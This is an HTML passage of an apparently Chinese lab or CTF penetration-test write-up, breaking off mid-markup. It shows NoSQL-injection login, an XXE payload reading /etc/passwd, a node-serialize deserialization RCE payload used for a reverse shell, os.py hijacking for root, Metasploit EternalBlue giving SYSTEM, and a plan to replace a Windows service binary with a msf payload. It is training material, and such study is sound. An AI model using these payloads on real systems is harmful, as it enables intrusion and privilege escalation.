src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-13.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<hr \/>\n<h3>\u7b2c\u4e8c\u53f0\u673a\u5668<\/h3>\n<hr \/>\n<p>.102 \u5728\u521a\u521a\u626b\u63cf\u7684\u7ed3\u679c\u4e2d\u53ea\u6709\u4e00\u4e2a ssh \u7aef\u53e3\u5f00\u653e\uff08\u6240\u4ee5\u4e00\u5f00\u59cb\u6ca1\u6253\uff0c\u89c9\u5f97\u6ca1\u4e1c\u897f\uff09\uff0c\u518d\u5355\u72ec\u626b\u4e00\u6b21\u5e38\u89c1 Web \u670d\u52a1\u7aef\u53e3\uff0c\u53d1\u73b0 5000 \u5f00\u653e<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688302185-\u5fae\u4fe1\u622a\u56fe_20230630090345-1024x356.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688302185-\u5fae\u4fe1\u622a\u56fe_20230630090345-1024x356.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u6302 socks \u4ee3\u7406\u540e\u8bbf\u95ee\uff0c\u662f\u4e2a\u767b\u5f55\u754c\u9762\uff0cWappalyzer \u63a2\u6d4b\u4e3a Express + Node.js<\/p>\n<p>\u7136\u540e\u8f93\u5165\u7528\u6237\u540d\u548c\u5bc6\u7801\u6293\u5305\uff0c\u56e0\u4e3a\u96a7\u9053\u662f\u6253\u5728 VPS \u4e0a\u7684\uff0c\u6240\u4ee5\u7528 bp \u6293\u5305\u7684\u65f6\u5019\u8981\u8bbe\u7f6e <code>User options -&gt; SOCKS Proxy<\/code><\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688369956-21-1024x479.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688369956-21-1024x479.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u767b\u9646\u4e0d\u6210\u529f\uff0c\u7206\u7834\u65e0\u679c\uff0c\u8003\u8651\u6ce8\u5165\uff0c\u56e0\u4e3a\u662f Node.js\uff0c\u60f3\u5230 Nosql \u6ce8\u5165\uff0c\u5e38\u7528 payload \u6253\u4e00\u4e0b\uff0c\u6210\u529f\u767b\u5f55<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688370102-22-1024x512.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688370102-22-1024x512.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688370135-23-1024x553.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688370135-23-1024x553.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>New Artical \u662f\u65b0\u5efa\u6587\u7ae0\u7684\u529f\u80fd\uff0c\u8bd5\u4e86\u4e0b\u6253 XSS\uff0c\u7ed3\u679c\u62a5\u9519\u628a\u8def\u5f84\u7206\u51fa\u6765\u4e86<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688370673-26-1024x352.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688370673-26-1024x352.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u7136\u540e\u6d4b\u4e86\u4e0b\u6587\u4ef6\u4e0a\u4f20\u63a5\u53e3\uff0c\u4e0a\u4f20\u540e\u663e\u793a\u683c\u5f0f\u4e0d\u5339\u914d<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688370177-24-1024x359.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688370177-24-1024x359.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u63a5\u7740\u6293\uff0c\u901a\u8fc7\u56de\u663e\u731c\u6d4b\u53ef\u4ee5\u6253 XXE\uff0c\u5e38\u7528 payload \u6253\u4e00\u4e0b<\/p>\n<pre data-language=\"XML\"><code class=\"language-markup line-numbers\">&lt;?xml version = \"1.0\"?&gt;\n&lt;!DOCTYPE title [\n&lt;!ELEMENT title ANY&gt;\n&lt;!ENTITY file SYSTEM \"file:\/\/\/etc\/passwd\"&gt; \n]&gt;\n&lt;post&gt;&lt;title&gt;&amp;file;&lt;\/title&gt;&lt;description&gt;Example Description&lt;\/description&gt;&lt;markdown&gt;Example Markdown&lt;\/markdown&gt;&lt;\/post&gt;\n\n<\/code><\/pre>\n<p>\u56de\u663e\u6b63\u5e38\uff0c\u53ef\u4ee5\u5229\u7528<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688370349-25-1024x485.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688370349-25-1024x485.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u4f46\u662f\u76f4\u63a5\u8bfb <code>\/root\/root.txt<\/code> \u4e0d\u884c\uff0c\u5e94\u8be5\u662f\u6743\u9650\u95ee\u9898\uff0c\u5c1d\u8bd5\u8bfb\u6e90\u7801 <code>\/home\/bog\/blog\/server.js<\/code><\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688429483-25-1024x481.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688429483-25-1024x481.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p><br><\/p>\n<pre><code class=\"language-javascript line-numbers\">const express = require('express')\nconst mongoose = require('mongoose')\nconst Article = require('.\/models\/article')\nconst articleRouter = require('.\/routes\/articles')\nconst loginRouter = require('.\/routes\/login')\nconst serialize = require('node-serialize')\nconst methodOverride = require('method-override')\nconst fileUpload = require('express-fileupload')\nconst cookieParser = require('cookie-parser');\nconst crypto = require('crypto')\nconst cookie_secret = \"UHC-SecretCookie\"\n\/\/var session = require('express-session');\nconst app = express()\n\nmongoose.connect('mongodb:\/\/172.18.0.2\/blog')\n\napp.set('view engine', 'ejs')\napp.use(express.urlencoded({ extended: false }))\napp.use(methodOverride('_method'))\napp.use(fileUpload())\napp.use(express.json());\napp.use(cookieParser());\n\/\/app.use(session({secret: \"UHC-SecretKey-123\"}));\n\nfunction authenticated(c) {\n    if (typeof c == 'undefined')\n        return false\n\n    c = serialize.unserialize(c)\n\n    if (c.sign == (crypto.createHash('md5').update(cookie_secret + c.user).digest('hex')) ){\n        return true\n    } else {\n        return false\n    }\n}\n\napp.get('\/', async (req, res) =&gt; {\n    const articles = await Article.find().sort({\n        createdAt: 'desc'\n    })\n    res.render('articles\/index', { articles: articles, ip: req.socket.remoteAddress, authenticated: authenticated(req.cookies.auth) })\n})\n\napp.use('\/articles', articleRouter)\napp.use('\/login', loginRouter)\n\napp.listen(5000)\n<\/code><\/pre>\n<p>\u5b58\u5728\u5bf9 <code>cookies.auth<\/code> \u7684\u53cd\u5e8f\u5217\u5316\u64cd\u4f5c\uff0c\u8003\u8651\u53cd\u5f39 shell \u5230 100 \u7684\u67d0\u4e2a\u7aef\u53e3\u4e0a<\/p>\n<pre><code class=\"language-javascript line-numbers\">serialize = require('node-serialize');\nvar test = {\n rce : function(){require('child_process').exec('cmd',function(error, stdout, stderr){console.log(stdout)});},\n}\nconsole.log(\"\u5e8f\u5217\u5316\u751f\u6210\u7684 Payload: \\n\" + serialize.serialize(test));\n<\/code><\/pre>\n<p>\u672c\u5730\u751f\u6210\u540e <code>urlencode()<\/code> \u4e0b\uff0c\u7136\u540e\u66ff\u6362 auth \uff0c\u53d1\u5305\u5373\u53ef<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688437452-\u5fae\u4fe1\u622a\u56fe_20230704102353-1024x474.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688437452-\u5fae\u4fe1\u622a\u56fe_20230704102353-1024x474.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688437414-\u5fae\u4fe1\u622a\u56fe_20230704102324-1024x195.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688437414-\u5fae\u4fe1\u622a\u56fe_20230704102324-1024x195.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u53ef\u4ee5\u63a5\u7740\u7528 pspy64\/lse.sh \u8fd9\u7c7b\u5de5\u5177\u63a2\u4e00\u4e0b\uff0c\u4f46\u662f\u56e0\u4e3a\u4e0d\u51fa\u7f51\uff0c\u6240\u4ee5\u8003\u8651\u7684\u662f\u5728 .100 \u4e0a\u653e\u597d\u518d\u4f20\u5230 .102 \u4e0a<\/p>\n<p>\u6ce8\u610f\u5230 <code>\/bin\/check<\/code> \u91cc\u9762\u5bfc\u5165\u4e86 os \u6a21\u5757\u4f46\u662f\u6ca1\u4f7f\u7528\uff0c\u540c\u65f6 os.py \u53ef\u5199\uff1b\u6240\u4ee5\u601d\u8def\u5176\u5b9e\u5c31\u662f\u628a <code>\/usr\/lib64\/python2.7\/os.py<\/code> \u6539\u4e3a <code>system('bash')<\/code>\uff0c\u7136\u540e <code>sudo \/bin\/check<\/code> \u6267\u884c\u63d0\u6743<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688437795-1-1024x168.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688437795-1-1024x168.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>PS\uff1a\u6253\u8fd9\u5757\u7684\u65f6\u5019\u6298\u817e\u4e86\u4e00\u4f1a\uff0c\u7136\u540e .102 \u73af\u5883\u5c31\u4e0d\u592a\u7a33\u5b9a\u4e86\uff0c\u518d\u540e\u6765 socks \u8fde\u63a5\u4e0d\u8fc7\u53bb\u4e86\u2026\u2026<\/p>\n<hr \/>\n<h3>\u7b2c\u4e09\u53f0\u673a\u5668<\/h3>\n<hr \/>\n<p>.200 \u5b58\u5728 MS17-010\uff0c\u548c\u4e91\u955cInitial\u90a3\u4e2a\u4e00\u6837\uff0cmsf \u8d70 socks \u4ee3\u7406\uff0c<code>windows\/smb\/ms17_010_eternalblue<\/code>=&gt;<code>set RHOST 10.10.10.200<\/code>=&gt;<code>run<\/code><\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-14.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-14.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<pre><code class=\"language-shell line-numbers\">meterpreter &gt; getuid\n[proxychains] DLL init: proxychains-ng 4.16\n[proxychains] DLL init: proxychains-ng 4.16\nServer username: NT AUTHORITY\\SYSTEM\n[proxychains] DLL init: proxychains-ng 4.16\n[proxychains] DLL init: proxychains-ng 4.16\n[proxychains] DLL init: proxychains-ng 4.16\n[proxychains] DLL init: proxychains-ng 4.16\n[proxychains] DLL init: proxychains-ng 4.16\n<\/code><\/pre>\n<p>\u7cfb\u7edf\u6743\u9650\uff0c\u76f4\u63a5\u8bfb<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-15.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-15.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<hr \/>\n<h3>\u7b2c\u56db\u53f0\u673a\u5668<\/h3>\n<hr \/>\n<p>.201 \u6709 80 \u7aef\u53e3\u5f00\u653e\uff0c\u5f00 NPS \u76f4\u63a5\u8d70\uff0c\u9700\u8981\u5bc6\u7801\uff0cadmin\/admin \u767b\u5f55<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-16-1024x543.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-16-1024x543.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u5b58\u5728\u6587\u4ef6\u4e0a\u4f20\u63a5\u53e3<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-17-1024x364.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/06\/1-17-1024x364.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u5f00 bp \u622a\u4e86\u4e00\u4e0b\u8fd4\u56de\u5305\u53d1\u73b0\u5e76\u4e0d\u4f1a\u8fd4\u56de\u5b58\u50a8\u8def\u5f84\uff0c\u53ea\u4f1a\u8df3\u8f6c\u5230 <code>\/sp_up.php?msg=SUCCESS<\/code>\uff0c\u6ce8\u610f\u5230 445 \u7aef\u53e3\u5f00\u653e\uff0c\u6682\u65f6\u6ca1\u4ec0\u4e48\u597d\u7684\u601d\u8def\uff0c\u770b\u4e86\u4e00\u4e0b wp\uff0c\u63d0\u5230\u4e86\u5229\u7528 SCF\u6587\u4ef6\u653b\u51fb<\/p>\n<p>\u5e94\u8be5\u662f\u6539\u7f16\u81ea\u8fd9\u91cc<a class=\"wp-editor-md-post-content-link\" href=\"https:\/\/www.freebuf.com\/articles\/web\/291348.html\" title=\"\u300a\u5229\u7528SCF\u6587\u4ef6\u653b\u51fb\u8fdb\u884c\u6e17\u900f\u5b9e\u6218\u300b\">\u300a\u5229\u7528SCF\u6587\u4ef6\u653b\u51fb\u8fdb\u884c\u6e17\u900f\u5b9e\u6218\u300b<\/a><\/p>\n<p>\u51c6\u5907\u597d\u6587\u4ef6\u4e0a\u4f20\uff0c\u6293\u53d6 NTLMv2 Hash \u7136\u540e\u5b57\u5178\u89e3\u5bc6\uff08\u6b64\u5904\u7701\u7565\u2026\u2026 \u56e0\u4e3a responder \u76d1\u542c\u4e00\u76f4\u5931\u8d25\uff0c\uff09<\/p>\n<p>\u5728\u7aef\u53e3\u626b\u63cf\u7684\u65f6\u5019\u53ef\u4ee5\u77e5\u9053 5985 \u7aef\u53e3\u662f\u5f00\u653e\u7684\uff0c\u6240\u4ee5\u53ef\u4ee5\u5c1d\u8bd5\u5229\u7528 <code>evil-winrm<\/code> \u8fdb\u884c\u653b\u51fb<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688606865-1-1024x284.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688606865-1-1024x284.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u67e5\u627e\u5f53\u524d\u7528\u6237\u7684\u5386\u53f2 <code>PowerShell<\/code> \u8bb0\u5f55 <code>type C:\\Users\\tony\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt<\/code><\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688606908-\u5fae\u4fe1\u622a\u56fe_20230704102324-1024x155.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688606908-\u5fae\u4fe1\u622a\u56fe_20230704102324-1024x155.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" \/><\/div>\n<p>\u4ece\u8fdc\u7a0b\u4e0b\u8f7d\u4e86 service.exe \u5e76\u4e14\u5728<code>C:\\Program Files\\goservice<\/code> \u4e2d\u8fd0\u884c\uff0c\u53ef\u4ee5\u8003\u8651 msf \u751f\u6210\u4e00\u4e2a\u76d1\u542c payload.exe \u7136\u540e\u66ff\u6362\u6389\u8fd9\u4e2a service.exe<\/p>\n<p>\u672c\u5730\u751f\u6210\u540e\u4e0a\u4f20\u5230 .100\uff0cpython \u5f00\u542f http.server \u670d\u52a1<\/p>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/119.45.47.125\/wp-content\/uploads\/2023\/07\/1688626162-1-1024x418.png'><img class=\"lazyload lazyload-style-1\" 